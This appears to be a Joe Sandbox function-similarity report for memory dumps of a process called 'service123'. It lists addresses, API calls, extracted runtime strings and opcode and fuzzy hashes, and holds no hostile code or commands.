Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: adf8c56c6dc67d48eac4a5a144215f3d7bb29a48b4d3449f5114568b3f006f86
Instruction ID: 5fd937332560ad6b0a7e043d94c1e3e4e54447541550e56543205a3c46df40f7
Opcode Fuzzy Hash: adf8c56c6dc67d48eac4a5a144215f3d7bb29a48b4d3449f5114568b3f006f86
Instruction Fuzzy Hash: 8FF03AB0609345DFD7407F69C81835A7AB4BB43328F408B1CE8AA87AD0E7385018CF93

Function 6C34B990 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 432COMMON

Download Yara Rule

Strings

H8l, xrefs: 6C385240
T8l, xrefs: 6C3851F8
47l, xrefs: 6C384FDC, 6C385363, 6C38537B

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: H8l$T8l$47l
API String ID: 0-4264000642
Opcode ID: c7992ee03bd897da2b5761dd822c1aac6a1f9f7c236fbeb399eb310b53804108
Instruction ID: 9f2ef2a2cffae13dc09852f4dacbba25c38b55f326e4d06221a825e0ecff74fd
Opcode Fuzzy Hash: c7992ee03bd897da2b5761dd822c1aac6a1f9f7c236fbeb399eb310b53804108
Instruction Fuzzy Hash: 7EE1A5B024AB189BD781BF34C4805EEBAA1EF4168CF015C2CD4C26BB45DB78A5499FD7

Function 6C2C52CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C2C4D17
(null), xrefs: 6C2C52F7

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: c4cd5e306d2a5b8efdca30221092f5b77ba6c95185b32f2f7d0a0bce4f977f1e
Instruction ID: a8b9a05ea8df7de5fb9be83856328b62280586527003c44221632c268345e4d2
Opcode Fuzzy Hash: c4cd5e306d2a5b8efdca30221092f5b77ba6c95185b32f2f7d0a0bce4f977f1e
Instruction Fuzzy Hash: A8A17D7170839A8BD7A18E24C0907ABBBE1BB85309F148B2DECD887751D735D50ADB83

Function 00AC4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 00AC4647
(null), xrefs: 00AC4C27

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 21be2099d44543452bc0b18125430d419e2c1bd0bacb36273620f32dfdaadc94
Instruction ID: 174de1f2b501cff6d6f996b89e8872de942ca8df062734ebf77bc5e6328e57bc
Opcode Fuzzy Hash: 21be2099d44543452bc0b18125430d419e2c1bd0bacb36273620f32dfdaadc94
Instruction Fuzzy Hash: ADA1B13560C3958BD731DF24C0A0BAABBE1BF89314F168A1DE8D987342D735D906DB86

Function 00AC1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00AC1C20
Unknown pseudo relocation protocol version %d., xrefs: 00AC1DF3
Unknown pseudo relocation bit size %d., xrefs: 00AC1C6D

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 148a489318420f3762ac396370a10c065fe9a9758001e4be71d73bcfa53621ff
Instruction ID: cda6df3e616d1b29e8a3faf494f996879afe73c9ae1a31e97add6abef16041b5
Opcode Fuzzy Hash: 148a489318420f3762ac396370a10c065fe9a9758001e4be71d73bcfa53621ff
Instruction Fuzzy Hash: 12815E71B04605CBDB10DF68D880F69B7F1FB86344F17852DE895A7256E330EC158B92

Function 6C2BA850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 6C2BA9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C2BA970
Unknown pseudo relocation protocol version %d., xrefs: 6C2BAB43

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 784fadfc17bdb3cb3f22d56a16cc963545a081f2f2b7c9caa4228ea657548666
Instruction ID: 0103f37762db80c9c27092db886f0f588daa4ddb033d2d01789da0567416d28b
Opcode Fuzzy Hash: 784fadfc17bdb3cb3f22d56a16cc963545a081f2f2b7c9caa4228ea657548666
Instruction Fuzzy Hash: E971A072A0564EDBDB10CF69C58078EB7B4FB4538CF158529ED94BBB44E330E8458B91

Function 6C2C9128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2C9142
strchr.MSVCRT ref: 6C2C9152
atoi.MSVCRT ref: 6C2C9163

Strings

., xrefs: 6C2C9147

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 09cdf351c888d580b4fffcce2c8e7e3fe05039e3bb6e40b74d1bb5c9e16f529c
Instruction ID: 53145d92bbf30d5c6de6c88e3027972fe85de005e12e4bb77cee4d3dda3cbefd
Opcode Fuzzy Hash: 09cdf351c888d580b4fffcce2c8e7e3fe05039e3bb6e40b74d1bb5c9e16f529c
Instruction Fuzzy Hash: 03E0ECB1A047158ED7447F38C80939AB6E1BB8130CF868A6CD88897744E7799469DB53

Function 00AC80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00AC80F2
strchr.MSVCRT ref: 00AC8102
atoi.MSVCRT ref: 00AC8113

Strings

., xrefs: 00AC80F7

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: dac774d9c7e762bf82be702e3a1a304d78d15a6026c6f769128d4164e3a989b7
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: ACE0ECB19047018ED7407F38CA0A71ABAE1BB80300F4E8E6CE4888B245EB7D98469752

Function 6C2C9293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C2C929F
GetProcAddress.KERNEL32 ref: 6C2C92B3

Strings

advapi32.dll, xrefs: 6C2C9298
SystemFunction036, xrefs: 6C2C92A8

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 9ed8bec45e39a09abdccf6d30ab576aded7df9c38fb910eb0ee9ecbf541b120d
Instruction ID: d10252b2f3bdd42b032f5b8425869ce8feb427e3a1bd591b44fdde8d458ec04f
Opcode Fuzzy Hash: 9ed8bec45e39a09abdccf6d30ab576aded7df9c38fb910eb0ee9ecbf541b120d
Instruction Fuzzy Hash: 05E0ECB2D99300CFCB00BF78950614ABBF4BA0A324F014A6ED4DA97604E7349454CF9B

Function 6C2C1409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C2C14D2

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 5edf6d0b0a2f006d9100e2b9d7f28f33e88e1d5d181a48a128062e94221d52e2
Instruction ID: 492fc08ac17e185efae6dbff414834b9dacf29b54a3c1d60818b81184ddcf284
Opcode Fuzzy Hash: 5edf6d0b0a2f006d9100e2b9d7f28f33e88e1d5d181a48a128062e94221d52e2
Instruction Fuzzy Hash: 3F22F0B5A097458FC760CF29C48465AFBE1BF89348F158A2EE9D897710EB74E844CB43

Function 6C349F20 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C349FEC
memset.MSVCRT ref: 6C34A04E

Strings

8O9l0, xrefs: 6C34A1F4, 6C34A200
8O9l0, xrefs: 6C349FF1, 6C34A00D

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memset
String ID: 8O9l0$8O9l0
API String ID: 2221118986-823793571
Opcode ID: cbad2cf71901cfbdf0fcbe61647e3896bb5a6c81b0f6da9f4134df27ec44b2f5
Instruction ID: 9f0cc6858b078ed06cb1ea261995a7749f1e17f044347e4fbb4c29b78f25ce0f
Opcode Fuzzy Hash: cbad2cf71901cfbdf0fcbe61647e3896bb5a6c81b0f6da9f4134df27ec44b2f5
Instruction Fuzzy Hash: 0FF1027460A305CFCB10CF29C580A4AB7F5FB86318B29CA6DD9589B710E732E906DF91

Function 6C2BA340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2BA3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2CC41C), ref: 6C2BA3E0
free.MSVCRT ref: 6C2BA3EA

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 9bc53124e22f197899b8227ea7be2eefa3c62820b4097cd03e4c713273f5c0d9
Instruction ID: 9786d95248acd3fd235875871feb7e463f339638c19c77176dbc22febde4e7d7
Opcode Fuzzy Hash: 9bc53124e22f197899b8227ea7be2eefa3c62820b4097cd03e4c713273f5c0d9
Instruction Fuzzy Hash: BC318D7161971ACBD300AF2AD48461BFBF1AFC179DF210A2CEDA467B40D7B1C8498792

Function 6C305C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C305D74
memchr.MSVCRT ref: 6C305D93

Part of subcall function 6C378520: setlocale.MSVCRT ref: 6C378535

Strings

-, xrefs: 6C305F72
., xrefs: 6C305D85

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 637741a7dd6116de38d670952bba83bb125c9e6fe558ffea5d4406edc909cedd
Instruction ID: 447b7c09a8022744485481b6c04123dde864868d0816a1566b7897643f0a58be
Opcode Fuzzy Hash: 637741a7dd6116de38d670952bba83bb125c9e6fe558ffea5d4406edc909cedd
Instruction Fuzzy Hash: BDD14AB1A083598FCB00DFA8C08468EBBF1BF48358F15862AE894EB755D734D945CF96

Function 6C306080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3061AE
memchr.MSVCRT ref: 6C3061CD

Part of subcall function 6C378520: setlocale.MSVCRT ref: 6C378535

Strings

., xrefs: 6C3061BF
6, xrefs: 6C3063B6

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 14a180fd600997b1495d415d5896580da9657cb4909a58d5eb326a88c360c21d
Instruction ID: ddf175d35ef7bb18e5572ce287365c19f92647b04bbbc472c20877ee83b693b1
Opcode Fuzzy Hash: 14a180fd600997b1495d415d5896580da9657cb4909a58d5eb326a88c360c21d
Instruction Fuzzy Hash: 9FD139B1A087598FCB00DFA8C48058EBBF4BF48318F158A6AE8A4E7755D734D945CF92

Function 6C380F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C380FD5

Strings

basic_string::append, xrefs: 6C38104D, 6C381059, 6C38114C, 6C38120C

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 65e9223e5f169fa911d98d8ca17df96f666f3c57ff1662b8f642f95d108bef02
Instruction ID: 02599b8decc01d3ada37663eae1669d78288a876db677a9eacc8417fe661d79e
Opcode Fuzzy Hash: 65e9223e5f169fa911d98d8ca17df96f666f3c57ff1662b8f642f95d108bef02
Instruction Fuzzy Hash: 44A158B5A052049FCB00EF68C5C469EBBF5FF89354F408969E8988B744E735E948CF92

Function 6C31B2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C31997F), ref: 6C31B336
memcpy.MSVCRT(?,?,?,?,?,?,6C31997F), ref: 6C31B3A1
memcpy.MSVCRT(00000000,?,?,6C31997F), ref: 6C31B3E8

Strings

basic_string::assign, xrefs: 6C31B403

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: e04edcf142fb19cbb03ed67864f30923559a4cd0d138d1569e799374ec0698e4
Instruction ID: 26c6f0bace7197a7df5360ee0bd89c3b9b206a83205778b4b25e9a0618e51616
Opcode Fuzzy Hash: e04edcf142fb19cbb03ed67864f30923559a4cd0d138d1569e799374ec0698e4
Instruction Fuzzy Hash: 675178B1B0A6118FD708DF29C48461AFBE5EF8531CB508A6DE4858FB24E7319805CF82

Function 6C324410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C324471
memcpy.MSVCRT ref: 6C3244DF
memcpy.MSVCRT ref: 6C324518

Strings

basic_string::assign, xrefs: 6C324534

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 6517a8fe9834b863ca2fb9445d02315385b054ec75c9956bc55c9696d536a97f
Instruction ID: 47ac637efb2787eb75f32660eee56fbc35abda6fcb119481b3a4c9eb2d7f6adc
Opcode Fuzzy Hash: 6517a8fe9834b863ca2fb9445d02315385b054ec75c9956bc55c9696d536a97f
Instruction Fuzzy Hash: 0351B071B0A6118FDB00DF28E48461AFBF5BF86318F218A6DD4848B718E739D805CF82

Function 6C2DE980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2DE9AA
wcslen.MSVCRT ref: 6C2DEA1A

Strings

basic_string: construction from null is not valid, xrefs: 6C2DE9E2, 6C2DEA52, 6C2DEAC2

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 4e75b8ee747405f0031320f84e327f6b33651819fdc29b0dc3b03dc9d0c5f887
Instruction ID: 989b97336485d621dd841b898db8d26af988360d270b5286802a21d499f0fe53
Opcode Fuzzy Hash: 4e75b8ee747405f0031320f84e327f6b33651819fdc29b0dc3b03dc9d0c5f887
Instruction Fuzzy Hash: 78417CF1A056158FCB00FF28D48184AFBA0BF55218F5649B9E8858B715E231E999CBD2

Function 6C2DE581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2DE5AD
strlen.MSVCRT ref: 6C2DE5FD

Strings

basic_string: construction from null is not valid, xrefs: 6C2DE5CF, 6C2DE61F, 6C2DE66F

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

